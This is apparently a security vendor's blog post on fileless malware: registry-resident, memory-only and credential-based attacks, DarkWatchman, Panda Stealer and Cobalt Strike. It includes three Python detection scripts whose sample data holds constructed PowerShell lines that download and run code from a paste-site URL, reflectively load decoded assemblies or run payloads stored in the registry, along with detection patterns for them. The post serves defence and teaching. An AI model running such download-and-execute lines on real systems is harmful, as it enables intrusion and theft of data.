Fileless malware, often also referred to as a malware-less attack, can be seen as any attack that uses native, legitimate tools built into a system to execute a cyber attack. In practice this means that the attacker does not need to install any malicious code onto the compromised machine, making detection a far harder prospect. It also complicates analysis, making any such attack far harder to defend against, especially for traditional antivirus products that rely on detecting signatures left by malware installs or detecting the malware itself.
Back in 2015, security researchers were detecting these types of attacks, but they were incredibly rare and were the sole domain of Chinese state-sponsored groups furthering the Chinese government's geopolitical aims. As is often the case, the work of nation-state threat actors soon gets emulated by more financially minded hackers with little to no affiliation or loyalty to a state institution. Recent research suggests that instances of these attacks increased by some 70% in 2022 over the previous year, continuing a clear upward trend: detections were already up 62% in 2021. These increases have been attributed to the increased adoption of fileless tactics by financially motivated threat actors and groups.
Types of Fileless Malware Attacks
Fileless malware has become a fairly broad catch-all term for several specific attacks. These include:
- Exploit kits
- Hijacked native tools
- Registry resident malware
- Memory-only malware
- Fileless ransomware
- Stolen credentials
Each deserves a brief look in turn.
Exploit Kits
These had their heyday when Internet Explorer and Adobe's Flash Player were turning out security vulnerabilities like they were going out of fashion. Threat actors developed kits that would exploit several publicly disclosed vulnerabilities, built from pieces of code, sequences of commands, or even in some instances collections of data. Exploit kits can be fileless in the sense that they are loaded into and initialized from memory rather than installed as malware files on disk. This also allows threat actors to automate infection chains and scale attacks according to the size of the target.
Hijacked Local Tools
Another popular form of fileless malware is the abuse of legitimate tools and applications. One way to do this is by sending instructions via the command line of a computer. This has proved a good way to evade detection as traditional antivirus packages do not monitor command-line interactions. Further, zero-day vulnerabilities in popular applications can be leveraged to carry out fileless attacks by executing the attack from within memory.
Registry Resident Malware
At its most fundamental, this is malware that installs itself within the Windows Registry, a core part of the operating system. This helps it avoid detection and also keeps it persistent on the machine even after the system is restarted for whatever reason.
This is commonly done via a malware dropper. Traditional malware typically infects Windows machines by way of a dropper, a program that downloads a malicious file to disk; as long as that file remains on the target system it is exposed to detection by antivirus software. Fileless malware may also use a dropper program, but it does not download a malicious file. Instead, the dropper itself writes the malicious code straight into the Windows registry.
The malicious code can be set to launch every time the OS starts, and there is no malicious file to discover: the code is hidden inside native registry data, which antivirus software does not subject to file-based signature detection.
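As an added example (not code from the original article), here is a defender's triage script in Python for exactly this persistence pattern: it walks exported autorun registry values, decodes any `-EncodedCommand` argument, and flags launchers that pull their real code from the registry rather than from a file. The registry paths, value names and the `ConstructedSample` key are constructed sample data.

```python
import base64
import re

# Constructed sample autorun entries (key, value name, command), in the shape an
# export of the Windows Run keys might take. Only the first entry is benign.
RUN = r"Software\Microsoft\Windows\CurrentVersion\Run"
STAGE = r"IEX (Get-ItemProperty HKCU:\Software\ConstructedSample).Payload"
ENCODED = base64.b64encode(STAGE.encode("utf-16le")).decode()
SAMPLE_AUTORUNS = [
    ("HKCU\\" + RUN, "OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("HKCU\\" + RUN, "Updater", "powershell.exe -NoP -w hidden -enc " + ENCODED),
    ("HKLM\\" + RUN, "Loader", r'cmd.exe /c start /min powershell -c "iex (gp HKCU:\Software\ConstructedSample).Payload"'),
]

SCRIPT_HOST = re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta)(\.exe)?\b", re.I)
ENCODED_ARG = re.compile(r"-(?:enc|e|ec|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Signs that the launcher pulls its real code from somewhere other than a file.
MARKERS = [
    ("dynamic evaluation (iex)", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("reads code from registry", re.compile(r"\b(get-itemproperty|gp)\b", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
]

def decode_encoded_command(command):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_autoruns(entries):
    """Flag autorun values that launch a script host carrying in-memory code."""
    findings = []
    for key, name, command in entries:
        if not SCRIPT_HOST.search(command):
            continue  # a plain executable path: out of scope for this check
        decoded = decode_encoded_command(command)
        # Inspect the visible command line (minus the base64 blob) plus the decoded text.
        text = ENCODED_ARG.sub("", command) + " " + (decoded or "")
        reasons = [label for label, rx in MARKERS if rx.search(text)]
        if decoded is not None:
            reasons.insert(0, "encoded command")
        if reasons:
            findings.append({"key": key, "value": name, "reasons": reasons, "decoded": decoded})
    return findings
```

On a live system the same logic applies to the output of an autoruns export; the point is that the payload stored in another registry value never appears as a file for a scanner to hash.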
Memory Only Malware
As the name suggests, this is malware that resides in memory only. To do this successfully, the malware needs to abuse legitimate, trusted tools such as Windows PowerShell, VBScript, and Windows Management Instrumentation (WMI) to execute and remain persistent. Once initial access is secured, these tools and the malware hidden within random access memory (RAM) have been seen to gain increased privileges, backdoor compromised machines, and spread laterally to compromise linked machines on the target network.
Fileless Ransomware
Recently, ransomware threat actors have been using fileless techniques, either embedding malicious code in documents through native scripting such as Office macros or writing the malicious code directly into memory through the use of an exploit. The ransomware then hijacks native tools like PowerShell to encrypt the hostage files, all without ever having written a single line to disk. Microsoft has responded to this threat in particular by disabling macros by default in several of its products, but end users should not feel too secure, as threat actors are known for developing cunning plans.
Stolen Credentials
While this is not strictly a fileless attack, security researchers have noted how stolen credentials have been used to start such an attack. This is done by accessing legitimate tools as a privileged user. For example, tools such as Windows Management Instrumentation (WMI) or PowerShell are used to execute commands that enable the attack and load malware to memory. Alternatively, they can establish persistence by hiding code in the registry or the kernel, or by creating user accounts that grant them access to any system they choose.
Real World Examples
Unfortunately, this is not solely the realm of theory and several real-world fileless attacks deserve to be mentioned.
Dark Watchman
This rather nasty Remote Access Trojan (RAT) hides in the Windows Registry: it is a lightweight and highly capable JavaScript RAT paired with a C# keylogger. The keylogger uses the Windows Registry as a fileless storage mechanism to maintain persistence, and in true fileless form the malware is not written to disk; instead, a scheduled task is created to launch DarkWatchman once a user logs in. Despite its small footprint, it is fully featured, with the following capabilities:
- Execute EXE files (with or without the output returned)
- Load DLL files
- Execute commands on the command line
- Execute WSH commands
- Execute miscellaneous commands via WMI
- Execute PowerShell commands
- Evaluate JavaScript
- Upload files to the C2 server from the victim machine
- Remotely stop and uninstall the RAT and Keylogger
- Remotely update the C2 server address or call-home timeout
- Update the RAT and Keylogger remotely
- Set an autostart JavaScript to run on the RAT startup
- A Domain Generation Algorithm (DGA) for C2 resiliency
- If the user has admin permissions, it deletes shadow copies using vssadmin.exe
Panda Stealer
In 2021, Panda Stealer was discovered with an interesting infection chain that deserves special mention. The malware is initially delivered through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files, a fairly typical infection chain so far. Then the interesting part begins: if the Excel file is opened, an Excel formula runs a PowerShell command that accesses paste.ee, a Pastebin alternative. This then retrieves a second, encrypted PowerShell command which imports a function. That function loads a .NET assembly in memory from a paste.ee URL. The fileless payload is obfuscated, and it replaces a legitimate MSBuild.exe process with the hex-encoded Panda Stealer binary, which is in turn retrieved from a different paste.ee URL.
All this is done to remain undetected. The malware itself can collect details like private keys and records of past transactions from its victim's various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, but it can also steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It is also capable of taking screenshots of the infected computer and exfiltrating browser data such as cookies, passwords, and payment card data. This is all done from memory with no malware being written to disk.
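Every stage of that chain leaves a process lineage even though it leaves no file. As an added example (not code from the article or from any Panda Stealer analysis), the Python below replays constructed process-creation events, in the shape of a simplified Sysmon Event ID 1 feed, and raises alerts on the three relationships the chain depends on: an Office application spawning a script engine, the script engine fetching code from a paste site, and MSBuild.exe starting beneath that script engine. The pids, paths and the paste.ee URL are all constructed.

```python
import re

# Constructed process-creation events (pid, ppid, image, command line), in the
# shape of a simplified Sysmon Event ID 1 feed. Sample data, not real telemetry.
EVENTS = [
    (400, 1, "explorer.exe", "explorer.exe"),
    (512, 400, "EXCEL.EXE", r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Quote_Request.xls'),
    (640, 512, "powershell.exe",
     "powershell.exe -NoP -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/r/CONSTRUCTED')\""),
    (701, 640, "MSBuild.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
    (820, 400, "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
    (830, 820, "robocopy.exe", r"robocopy.exe C:\Data D:\Backup /MIR"),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PROXY_EXECUTION = {"msbuild.exe"}  # signed binary whose process is replaced by the payload
PASTE_SITES = re.compile(r"paste\.ee|pastebin\.com", re.I)

def ancestry(by_pid, pid):
    """Image names from pid up to the root: [self, parent, grandparent, ...]."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against pid reuse loops
        seen.add(pid)
        _, ppid, image, _ = by_pid[pid]
        chain.append(image.lower())
        pid = ppid
    return chain

def detect_fileless_chain(events):
    """Return (pid, rule, evidence) alerts for Office -> script engine -> MSBuild chains."""
    by_pid = {e[0]: e for e in events}
    alerts = []
    for pid, _, image, cmdline in events:
        img = image.lower()
        chain = ancestry(by_pid, pid)
        ancestors = set(chain[1:])
        lineage = " <- ".join(chain)
        if img in SCRIPT_ENGINES and OFFICE_APPS & ancestors:
            alerts.append((pid, "script engine spawned by an Office document", lineage))
        if img in SCRIPT_ENGINES and PASTE_SITES.search(cmdline):
            alerts.append((pid, "script engine pulling code from a paste site", cmdline))
        if img in PROXY_EXECUTION and SCRIPT_ENGINES & ancestors:
            alerts.append((pid, "MSBuild.exe launched beneath a script engine", lineage))
    return alerts
```

The benign backup script (pid 820) runs PowerShell too but matches none of the rules, which is the difference between alerting on a tool and alerting on how the tool is being chained.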
Cobalt Strike
Cobalt Strike often makes the news headlines for helping facilitate ransomware infections. However, its uses are far broader and more nuanced, and in the hands of a skilled threat actor it can deliver fileless malware payloads straight to memory to avoid detection. Together with other malware strains capable of fileless infection, such as Emotet, a banking trojan that steals a victim's financial information, it is clear that threat actors are favoring the fileless approach.
It is important to remember that Cobalt Strike is a legitimate penetration testing tool that has been used by attackers to establish a foothold in networks. Sadly, over the years the legitimate penetration testing tool has developed a reputation for being a cyber criminal’s best friend.
These three malware strains show exactly the threat posed by threat actors adopting fileless malware tactics, also referred to sometimes as “living off the land”. The last question then is how does one defend against these attacks if they can easily beat signature detection-based security software?
Defending Against Fileless Malware
The real key to successfully defending against fileless attacks is an integrated approach that addresses the entire threat lifecycle. To do this a multi-layered defense is required. This approach allows the defender to gain an advantage over attackers by being able to investigate every phase of a campaign.
In this regard, two things are especially important:
- The ability to see and measure what’s happening: discovering the techniques used by the attack, monitoring activities in PowerShell or other scripting engines, accessing aggregated threat data, and gaining visibility into user activities.
- The ability to control the state of the targeted system: halting arbitrary processes, remediating processes that are part of the attack, and isolating infected devices.
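One concrete form of "monitoring activities in PowerShell" is triaging Script Block Logging events (Event ID 4104). As an added example (not code from the article or any LMNTRIX product), the Python below first stitches fragmented script blocks back together, since PowerShell logs long scripts as numbered parts sharing a ScriptBlockId, and then scores each whole block on the stages of an in-memory loader: download, decode, reflective load, evaluation. The events, ScriptBlockIds and URL are constructed; the weights and threshold are illustrative assumptions.

```python
import re
from collections import defaultdict

# Constructed Event ID 4104 records. Block "aaaa-1" was logged in two fragments;
# neither fragment on its own reaches the alert threshold, the whole block does.
EVENTS = [
    {"ScriptBlockId": "aaaa-1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$u='https://paste.ee/r/CONSTRUCTED';$d=(New-Object Net.WebClient).DownloadString($u);"},
    {"ScriptBlockId": "bbbb-2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Logs -Filter *.log | Compress-Archive -DestinationPath D:\\archive.zip"},
    {"ScriptBlockId": "aaaa-1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "$b=[Convert]::FromBase64String($d);[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"},
]

# Stages of an in-memory loader chain with illustrative weights. Several are
# legitimate on their own (admins download and decode things); the combination
# of stages inside one script block is the signal.
STAGES = [
    ("download cradle", re.compile(r"downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod", re.I), 2),
    ("base64 decode", re.compile(r"frombase64string", re.I), 1),
    ("reflective assembly load", re.compile(r"reflection\.assembly\]::load|assembly\]::load\(", re.I), 2),
    ("dynamic evaluation", re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("msbuild.exe invocation", re.compile(r"msbuild(\.exe)?\b", re.I), 2),
]
ALERT_THRESHOLD = 4

def reassemble(events):
    """Group 4104 fragments by ScriptBlockId and join them in MessageNumber order."""
    parts = defaultdict(dict)
    for e in events:
        parts[e["ScriptBlockId"]][e["MessageNumber"]] = e["ScriptBlockText"]
    return {sbid: "".join(text for _, text in sorted(p.items())) for sbid, p in parts.items()}

def score_script_blocks(events):
    """Return {ScriptBlockId: (score, [matched stages])} for blocks at or above threshold."""
    results = {}
    for sbid, text in reassemble(events).items():
        hits = [(name, weight) for name, rx, weight in STAGES if rx.search(text)]
        score = sum(weight for _, weight in hits)
        if score >= ALERT_THRESHOLD:
            results[sbid] = (score, [name for name, _ in hits])
    return results
```

Scoring the fragments separately would miss this block, which is why reassembly comes before any pattern matching.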
This is by no means an easy task. Adopting more holistic approaches to cyber defense where threats are actively hunted requires a skilled team equipped with the right tools. At LMNTRIX, we understand that it is difficult to defend against these attacks but we also know that it can be done.
To conclude, we would like to add that fileless malware is a growing threat to businesses and individuals alike. Traditional antivirus software is not effective in detecting and removing fileless malware. By taking proactive steps to prevent these attacks from occurring, you can reduce the risk of falling victim to fileless malware.